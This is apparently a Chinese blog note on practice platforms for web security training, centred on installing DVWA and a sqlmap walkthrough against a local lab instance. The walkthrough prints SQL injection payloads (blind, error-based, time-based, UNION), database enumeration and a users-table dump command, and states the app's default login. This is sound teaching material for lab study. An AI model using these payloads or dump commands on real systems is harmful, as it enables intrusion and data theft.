网络攻防平台

DVWA : Damn Vulnerable Web Application

用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

安装

1
2
3
$ wget https://github.com/RandomStorm/DVWA/archive/v1.9.zip
$ unzip v1.9.zip
$ sudo cp -rp DVWA-1.9 /var/www/html/dvwa

安装必要的软件包:

1
$ sudo apt-get -y install apache2 mysql-server php5 php5-mysql php5-gd  spawn-fcgi php5-cgi

配置nginx+php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ sudo vim /etc/nginx/sites-available/default

server_name localhost;

# Add index.php to the list if you are using PHP
index index.php index.html index.htm index.nginx-debian.html;

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
include snippets/fastcgi-php.conf;

# With php5-cgi alone:
fastcgi_pass 127.0.0.1:9000;
# With php5-fpm:
#fastcgi_pass unix:/var/run/php5-fpm.sock;
}

启动

启动nginx+php:

1
2
$ sudo spawn-fcgi -a 127.0.0.1 -p 9000 -C 10 -u www-data -f /usr/bin/php5-cgi
$ sudo /etc/init.d/nginx start

访问 localhost/dvwa/setup.php 进行设置。

配置MySQL

1
$ sudo /etc/init.d/mysql start

dvwa/setup.php 创建数据库的时候可能报错,则需要将 ./config/config.inc.php 里面的数据库密码设置为空。

创建数据库后,登陆DVWA,用户/密码默认是 admin/password

用sqlmap.py来测试SQL注入

先在 DVWA Security 将安全级别调至Low。

然后,在 SQL Injection 部分,获取Cookie后,开始寻找注入点.

找到注入点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ export target="http://192.168.1.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6"

sqlmap identified the following injection point(s) with a total of 3814 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3459=3459 AND 'CsJK'='CsJK&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 2212 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(2212=2212,1))),0x7176627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kuZo'='kuZo&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))zYYB) AND 'XUNc'='XUNc&Submit=Submit

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(0x716a7a7171,0x70695670544345415271684e6f4c6975425959654447454149744f47707261797a7245716462547a,0x7176627171),NULL-- -&Submit=Submit

SQL注入并获取其它信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" --current-db

current database: 'dvwa'

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" --current-db --tables -Ddvwa

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" -T guestbook --columns

Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| comment | varchar(300) |
| comment_id | smallint(5) unsigned |
| name | varchar(100) |
+------------+----------------------+

$ python sqlmap.py -u $target --cookie="security=low; security=impossible; PHPSESSID=0qrratc24em680l0bucocti4v6" -T users --dump

Database: dvwa
Table: users
[5 entries]
.....

DVWA-WooYun

一个基于DVWA的PHP+Mysql漏洞模拟练习环境,通过将乌云主站上的有趣漏洞报告建模,以插件形式复现给使用该软件的帽子们,可以让乌云帽子们获得读报告体验不到的真实感,在实践的过程中可以无缝隙地深入理解漏洞的原理及利用方式

Metasploitable

http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip

WebGoat

由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境,为用户完成课程提供了有关的线索.

http://code.google.com/p/webgoat

ZVulDrill

Web漏洞演练平台

https://github.com/710leo/ZVulDrill

XCTF_OJ(X Capture The Flag Online Judge)

http://oj.xctf.org.cn/

XCTF-OJ (X Capture The Flag Online Judge)是由XCTF组委会组织开发并面向XCTF联赛参赛者提供的网络安全技术对抗赛练习平台。

XCTF-OJ平台将汇集国内外CTF网络安全竞赛的真题题库,并支持对部分可获取在线题目交互环境的重现恢复,XCTF联赛后续赛事在赛后也会把赛题离线文件和在线交互环境汇总至XCTF-OJ平台,形成目前全球CTF社区唯一一个提供赛题重现复盘练习环境的站点资源。

资料